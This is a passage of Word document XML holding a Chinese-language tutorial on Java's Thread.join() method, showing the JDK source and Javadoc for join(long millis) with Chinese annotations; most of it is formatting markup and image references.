          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> join() </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> InterruptedException {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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="491" name="图片 79"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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join(0);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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="492" name="图片 80" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pP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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>然后进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>join(0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="493" name="Codehighlighter1_3_461_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_3_461_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/**  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="494" name="图片 82"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    * Waits at most &lt;code&gt;millis&lt;/code&gt; milliseconds for this thread to   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="495" name="图片 83"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    * die. A timeout of &lt;code&gt;0&lt;/code&gt; means to wait forever. //</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>注意这句</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="496" name="图片 84"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    *  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="497" name="图片 85"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    * </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>@param</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>      millis   the time to wait in milliseconds.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="498" name="图片 86"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    * </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>@exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>  InterruptedException if another thread has interrupted  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="499" name="图片 87"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    *             the current thread.  The &lt;i&gt;interrupted status&lt;/i&gt; of the  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="500" name="图片 88"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    *             current thread is cleared when this exception is thrown.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="501" name="图片 89" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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8000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>    */</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="502" name="图片 90" descr="http://www.blogjava.net/Images/OutliningIndicators/Non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http://www.blogjava.net/Images/OutliningIndicators/None.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId135"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> join(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> millis) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>millis</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
